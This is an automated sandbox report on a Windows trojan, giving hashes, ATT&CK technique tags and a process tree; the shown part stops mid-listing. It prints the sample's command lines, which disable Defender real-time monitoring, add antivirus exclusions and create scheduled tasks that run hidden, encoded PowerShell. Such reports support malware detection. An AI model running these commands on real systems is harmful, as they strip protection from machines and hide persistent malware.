a02fc41c21e5cf0aa8919198cb3dc7e93bbbf7fb0b6ae8bc4c97332818b0dde1

Analysis

max time kernel
151s
max time network
142s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
09-02-2023 05:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

7.3MB
MD5

58cb96288d8ada838c2187dc9bd21fae
SHA1

56da68afe24c9d93ed7f0153c6550e5a357c0ba6
SHA256

a02fc41c21e5cf0aa8919198cb3dc7e93bbbf7fb0b6ae8bc4c97332818b0dde1
SHA512

010c64a79c90aefdbd1190e2b032cb601f588cb384ad6246c5dc454ed888225dd2792e7a6ab90cbadec286e340b98635a230e6a9230b92479981514ab022dbdf
SSDEEP

196608:91O8S2nXipTV2dErfoR7lfYhhKesL/QOtP7uvBr+jFq7F:3O5Yifm7lfWhKesL/QYDArQq7F

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 36 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.execonhost.exereg.exereg.exereg.exereg.exereg.exereg.execonhost.exereg.exereg.exereg.execonhost.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fIARWfhFKZMqBRuZLOR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\LtFzXrdCXcavHaVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KgqoRVUGdWyiycxE = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KgqoRVUGdWyiycxE = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IwGFDhhTU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dMFexHHRtytWC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tmuWEvHsDLUn = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dMFexHHRtytWC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\LtFzXrdCXcavHaVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fIARWfhFKZMqBRuZLOR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KgqoRVUGdWyiycxE = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn = "0"	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IwGFDhhTU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\KgqoRVUGdWyiycxE = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\MLrIJeslOBZU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\MLrIJeslOBZU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tmuWEvHsDLUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe

Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Install.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe
Executes dropped EXE 3 IoCs

Processes:

Install.exeInstall.exebpisjHu.exe

pid process

2020 Install.exe
612 Install.exe
1816 bpisjHu.exe
Loads dropped DLL 8 IoCs

Processes:

file.exeInstall.exeInstall.exe

pid process

1896 file.exe
2020 Install.exe
2020 Install.exe
2020 Install.exe
2020 Install.exe
612 Install.exe
612 Install.exe
612 Install.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

pid	process
2020	Install.exe
612	Install.exe
1816	bpisjHu.exe

pid	process
1896	file.exe
2020	Install.exe
2020	Install.exe
2020	Install.exe
2020	Install.exe
612	Install.exe
612	Install.exe
612	Install.exe

Drops file in System32 directory 7 IoCs

Processes:

powershell.EXEbpisjHu.exepowershell.EXEInstall.exepowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	bpisjHu.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	bpisjHu.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	bpisjHu.exe

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\bsXFoBxfaHoLLxRHnd.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1680 schtasks.exe
912 schtasks.exe
684 schtasks.exe
912 schtasks.exe
1432 schtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\bsXFoBxfaHoLLxRHnd.job	schtasks.exe

pid	process
1680	schtasks.exe
912	schtasks.exe
684	schtasks.exe
912	schtasks.exe
1432	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 9 IoCs

Processes:

wscript.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXE

pid	process
564	powershell.EXE
564	powershell.EXE
564	powershell.EXE
2016	powershell.EXE
2016	powershell.EXE
2016	powershell.EXE
832	powershell.EXE
832	powershell.EXE
832	powershell.EXE

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXE

description pid process

Token: SeDebugPrivilege 564 powershell.EXE
Token: SeDebugPrivilege 2016 powershell.EXE
Token: SeDebugPrivilege 832 powershell.EXE

description	pid	process
Token: SeDebugPrivilege	564	powershell.EXE
Token: SeDebugPrivilege	2016	powershell.EXE
Token: SeDebugPrivilege	832	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

file.exeInstall.exeInstall.exeforfiles.execmd.exeforfiles.execmd.exe

description	pid	process	target process
PID 1896 wrote to memory of 2020	1896	file.exe	Install.exe
PID 1896 wrote to memory of 2020	1896	file.exe	Install.exe
PID 1896 wrote to memory of 2020	1896	file.exe	Install.exe
PID 1896 wrote to memory of 2020	1896	file.exe	Install.exe
PID 1896 wrote to memory of 2020	1896	file.exe	Install.exe
PID 1896 wrote to memory of 2020	1896	file.exe	Install.exe
PID 1896 wrote to memory of 2020	1896	file.exe	Install.exe
PID 2020 wrote to memory of 612	2020	Install.exe	Install.exe
PID 2020 wrote to memory of 612	2020	Install.exe	Install.exe
PID 2020 wrote to memory of 612	2020	Install.exe	Install.exe
PID 2020 wrote to memory of 612	2020	Install.exe	Install.exe
PID 2020 wrote to memory of 612	2020	Install.exe	Install.exe
PID 2020 wrote to memory of 612	2020	Install.exe	Install.exe
PID 2020 wrote to memory of 612	2020	Install.exe	Install.exe
PID 612 wrote to memory of 996	612	Install.exe	forfiles.exe
PID 612 wrote to memory of 996	612	Install.exe	forfiles.exe
PID 612 wrote to memory of 996	612	Install.exe	forfiles.exe
PID 612 wrote to memory of 996	612	Install.exe	forfiles.exe
PID 612 wrote to memory of 996	612	Install.exe	forfiles.exe
PID 612 wrote to memory of 996	612	Install.exe	forfiles.exe
PID 612 wrote to memory of 996	612	Install.exe	forfiles.exe
PID 612 wrote to memory of 684	612	Install.exe	forfiles.exe
PID 612 wrote to memory of 684	612	Install.exe	forfiles.exe
PID 612 wrote to memory of 684	612	Install.exe	forfiles.exe
PID 612 wrote to memory of 684	612	Install.exe	forfiles.exe
PID 612 wrote to memory of 684	612	Install.exe	forfiles.exe
PID 612 wrote to memory of 684	612	Install.exe	forfiles.exe
PID 612 wrote to memory of 684	612	Install.exe	forfiles.exe
PID 996 wrote to memory of 1260	996	forfiles.exe	cmd.exe
PID 996 wrote to memory of 1260	996	forfiles.exe	cmd.exe
PID 996 wrote to memory of 1260	996	forfiles.exe	cmd.exe
PID 996 wrote to memory of 1260	996	forfiles.exe	cmd.exe
PID 996 wrote to memory of 1260	996	forfiles.exe	cmd.exe
PID 996 wrote to memory of 1260	996	forfiles.exe	cmd.exe
PID 996 wrote to memory of 1260	996	forfiles.exe	cmd.exe
PID 1260 wrote to memory of 1620	1260	cmd.exe	reg.exe
PID 1260 wrote to memory of 1620	1260	cmd.exe	reg.exe
PID 1260 wrote to memory of 1620	1260	cmd.exe	reg.exe
PID 1260 wrote to memory of 1620	1260	cmd.exe	reg.exe
PID 1260 wrote to memory of 1620	1260	cmd.exe	reg.exe
PID 1260 wrote to memory of 1620	1260	cmd.exe	reg.exe
PID 1260 wrote to memory of 1620	1260	cmd.exe	reg.exe
PID 684 wrote to memory of 1152	684	forfiles.exe	cmd.exe
PID 684 wrote to memory of 1152	684	forfiles.exe	cmd.exe
PID 684 wrote to memory of 1152	684	forfiles.exe	cmd.exe
PID 684 wrote to memory of 1152	684	forfiles.exe	cmd.exe
PID 684 wrote to memory of 1152	684	forfiles.exe	cmd.exe
PID 684 wrote to memory of 1152	684	forfiles.exe	cmd.exe
PID 684 wrote to memory of 1152	684	forfiles.exe	cmd.exe
PID 1260 wrote to memory of 1732	1260	cmd.exe	reg.exe
PID 1260 wrote to memory of 1732	1260	cmd.exe	reg.exe
PID 1260 wrote to memory of 1732	1260	cmd.exe	reg.exe
PID 1260 wrote to memory of 1732	1260	cmd.exe	reg.exe
PID 1260 wrote to memory of 1732	1260	cmd.exe	reg.exe
PID 1260 wrote to memory of 1732	1260	cmd.exe	reg.exe
PID 1260 wrote to memory of 1732	1260	cmd.exe	reg.exe
PID 1152 wrote to memory of 1728	1152	cmd.exe	reg.exe
PID 1152 wrote to memory of 1728	1152	cmd.exe	reg.exe
PID 1152 wrote to memory of 1728	1152	cmd.exe	reg.exe
PID 1152 wrote to memory of 1728	1152	cmd.exe	reg.exe
PID 1152 wrote to memory of 1728	1152	cmd.exe	reg.exe
PID 1152 wrote to memory of 1728	1152	cmd.exe	reg.exe
PID 1152 wrote to memory of 1728	1152	cmd.exe	reg.exe
PID 1152 wrote to memory of 1812	1152	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1896

C:\Users\Admin\AppData\Local\Temp\7zSE9C4.tmp\Install.exe
.\Install.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2020

C:\Users\Admin\AppData\Local\Temp\7zSEED2.tmp\Install.exe
.\Install.exe /S /site_id "525403"
3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:612

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:996

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:1260

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:1620

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:1732

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:684

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:1152

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
6⤵
PID:1728

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
6⤵
PID:1812

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gFHhEAAbA" /SC once /ST 04:40:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:1680

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gFHhEAAbA"
4⤵
PID:1928

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gFHhEAAbA"
4⤵
PID:1348

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bsXFoBxfaHoLLxRHnd" /SC once /ST 06:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn\qpzzvTdnDigAAZI\bpisjHu.exe\" Y9 /site_id 525403 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:912

C:\Windows\system32\taskeng.exe
taskeng.exe {C891A8B2-5A95-4BC7-AE78-347E883BE935} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:Interactive:[1]
1⤵
PID:1540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:564

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1328

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2016

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:832

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
PID:1716

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1512

C:\Windows\system32\taskeng.exe
taskeng.exe {B1E91904-F896-4FDE-992A-C35EE5D6E9A8} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1028

C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn\qpzzvTdnDigAAZI\bpisjHu.exe
C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn\qpzzvTdnDigAAZI\bpisjHu.exe Y9 /site_id 525403 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1816

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gcOVckcwJ" /SC once /ST 03:36:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:684

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gcOVckcwJ"
3⤵
PID:1692

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gcOVckcwJ"
3⤵
PID:1004

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
3⤵
PID:1700

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1156

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
3⤵
PID:520

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1168

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gHGRxwhdY" /SC once /ST 02:54:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:912

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gHGRxwhdY"
3⤵
PID:636

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gHGRxwhdY"
3⤵
PID:1196

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:32
3⤵
PID:956

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1912

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:64
3⤵
PID:564

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1012

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1524

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1472

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:64
3⤵
PID:692

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1328

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\KgqoRVUGdWyiycxE\ojrmovpe\cbqmByRxaocLcUyp.wsf"
3⤵
PID:1764

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\KgqoRVUGdWyiycxE\ojrmovpe\cbqmByRxaocLcUyp.wsf"
3⤵
- Modifies data under HKEY_USERS
PID:1616

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IwGFDhhTU" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:432

C:\Windows\SysWOW64\reg.exe
